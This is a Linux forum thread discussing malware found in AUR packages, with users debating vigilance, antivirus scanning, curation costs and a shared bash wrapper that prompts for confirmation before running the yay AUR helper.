Perhaps there ought to be a change, we can’t allow AUR to be a possible “cesspool” for rogue packages. Many ppl are now going open source & others might want to stop that with threat actors. 
Thanks 
Best way seems to be, as mentioned here multiple times, to be careful on what you install on your system.
But I’m curious about ClamAV also. I rarely see it mentioned and I’ve seen divided opinions about it.
What do people here think about ClamAV? And do we know if it would have catched those RATS? (Maybe someone dl’d one of those packages for analysis?)
There are threads around here about AV programs and peoples thoughts. However to not hijack this thread with a new subject it would be best to start a new thread since we now have a higher threat level this could be an interesting subject.
Call me paranoid if you like, but I’m wondering if the blatant (and lets be honest, not very good) attacks are a smokescreen for a more subtle and professional one.
may we should add something like this over yay ?
a simple script snipped in the .bashrc 
acting like a portal would be cool as an option on yay itself:
Well I don’t know but I do know so far they have been blatant. So far its stuff that a USER must install. Unlike the xz issue we faced earlier in the year. I have thought that said user could actually be a decoy user 
. Again this is no different than if you were using Windows. At the end of the day its the USERS vigilance which will keep them from downloading these programs to start with. I keep a minimal of packages installed from the AUR. I always try to go with OFFICIAL packages. However even OFFICIAL packages can become infected and that it is why it is important to always stay vigilant. Keep in touch with the community, Read the news. BE An ACTIVE USER.
would that work with other aur helpers?
for instance paru?
yea its only a script that pipes before it starts the bin asking yes or no and stops on that.
yay() {
echo -e "\e[1;31m\e[1mWARNING\e[0m" >&2
echo -e "\e[0;33mYou use yay, which allows you to build and install AUR packages.\e[0m" >&2
echo -e "\e[0;33mAUR packages are user-produced content.\e[0m" >&2
echo -e "\e[0;33mThese PKGBUILDs are completely unofficial and have not been thoroughly vetted.\e[0m" >&2
echo -e "\e[0;33mAny use of the provided files is at your own risk.\n\e[0m" >&2
read -rp "Do you want to continue? (y/N): " confirm
if [[ "$confirm" =~ ^[Yy]$ ]]; then
/usr/bin/yay "$@"
else
echo "Aborted."
return 1
fi
}
add this in your bashrc you can replace yay with paru and sure a script could catch more apps in one ..
Awesome.
Even though I normally hate crap like this I do think we should add this. Way to many NEW users coming over who unfortunately isn’t informed enough about the package management system and with the attacks we’ve had in the aur this year and with the Share increasing I suspect it will only get worse as it goes.
This is something simple and can be removed by more advance users who are aware of what they are doing. Great Idea.
Guess I already found the answer to my question, so not worth a new thread I guess.
https://www.virustotal.com/gui/file/37a66fbe73a9d5186b7d474e27fb8802dfef711715fa4818f722cf0bbfae0405
If you can’t allow AUR to be a “cesspool”, hire people for scanning any new or updated PKGBUILD.
Why not Windows like confirmation, after
"Do you want to continue? (y/N): "
once more :
"Do you really want to continue? (y/N): "
Also look out for a processor “systemd-initd” in tmp.
We need to raise funds to guard AUR.
We can’t depend on big tech to host the repos for open source. 
See:
I will say that so far the community has done a remarkable and under-appreciated (no one ever praises the detectors) job of catching this stuff quick.
So there seems to be a good system in place already. Unless, of course, these shenanigans escalate
Well, we could. Then again, a “terminal-centric distro” user should know what (s)he is doing.
It’s debatable. Should we bloat and start trying to protect everyone from themselves? Or shouldn’t we?
Wouldn’t like to see EOS end up like governments, or Windows… “Yes, I know what you want, but we know better and instead do the other thing! This is just to protect you, understand.”
Might be a good thing for newbies, though. Who should probably start with another distro in the first place…
I’m undecided.
I do think about still only an idea .. and adding that will not prevent stupid acting at all.. only adding a stop point is not more as a reminder. Not evryone is getting the info .. not everyone? more like no one ready any info at all nowadays
And in the end it is about keeping people save, not preventing from doing stupid things.
Yeah, no one reads anymore. 
Just yesterday watched a YT video titled “Linux after one year”, thinking it would present a conclusion after a year of Linux usage.
Instead, it was 60 minutes showing a guy wanting to pass a GPU on to a VM, talking to ChatGPT and planlessly copy-pasting everything that that Artificial Idiot told him. Over weeks. I seem to remember he even changed the Linux distro.
In the end, the worst outcome: It worked, but he didn’t know why, and said himself he would never be able to reproduce that setup. Pity. The only ones “learning” seem to be the AIs nowadays.
Do we really want yet another “Do you want to this…?”, “Do you want to that…?” For instance, I usually know what I’m doing and I’m already frustrated about the many “Yes/No/This/That” questions. I mean, okay, I did make it ask for PKGBUILD inspection and stuff, and I have a Timeshift hook, and lots of other stuff.
I mean I know users: The more questions we ask, the more lazy they get, count the number of RETURNs necessary to “get it installed, for god’s sake!” and never read anything again.
Can’t we just say “With great power comes great responsibility!” and leave it at that? Or (if your proposal is for the installer) make it an option like “Warn about AUR” that could be enabled by default, but also checked off?
Better than having to edit the .bashrc or whatever and opt out the hard way, don’t you think?
Nobody is actually suggesting that there IS a resolution to the problem. The problem is fully acknowledged and expressed in warnings about using the AUR.
There are multiple alternatives to this.
If you want to actually fix the issue (I mean fully resolve) with AUR, perhaps, in time, you can acquire enough staff to fully curate not only new entries, but also monitor all changes to all of the packages and pkgbuild scripts also… though I’d suggest you start up your own ‘AAUR’ because the AUR currently has a fair few projects (Repology says around 296180, total individual packages: 4519169.
As you import them, you must fully curate each one and check all links and binaries contained therein - going forward, you must also cater for the fact that many AUR scripts pull in software from external sources - sometimes a Snap, sometimes a DEB, sometimes an RPM - and you must also extend your vigilance to cope with the fact that a legitimate AUR entry pulling in a legitimate source code might be undermined if that source code changes to include malware.
Your job becomes exponentially more complicated with each level until you realise you’re dealing with an inclusive and accessible way for any Arch user to upload repositories, which means you are taking on the task of curating the entire web…
There’s a lot to be included in the phrase ‘they should…’. For starters - who are ‘THEY’ and how many do you think there are?
If you want to live in a Kindergarten, then you must stay inside the Kindergarten… On the most basic level, your SAFE environment (as safe as its reasonable to expect) is the Official Repository.
The AUR gives us access to the outside which cannot be fully curated.
Hiring people does not work with open source projects like Arch, EOS, etc. There is a limited budget. Hence there is a need for other solutions. Also it is not clear whether ClamAV will be able to help while downloading using yay or paru or other helpers.
This becomes doubly important as Windows 10 sunset is coming and Windows 11 is not palatable by a significant portion of users. Many of these users who would look to Linux, EOS or Mint or something else would be put off by this.
It is very easy to forget that many of users of EOS and Linux want to just use the OS. They do not want to work on EOS. Like a car or electrical appliances. Most of the users just want to use it. They do not want to know the internals and how they work. Unless Linux community understands this, Linux on Desktop or as primary work driver will remain elusive to people like us.
It’s you who want a free solution, tell me what they are.
People have been using Windows for decades and they will continue to use it. If they want to switch to Linux, they can choose a distro that is not Arch based, then the AUR “problem” is solved.
People pay for a car or electrical appliances, if they expect Linux to bring the same “warranty/service” for free they’re in denial.
You know what ? Linux community is not homogeneous, and I’m sure many Linux users don’t care if Linux remain elusive to some people.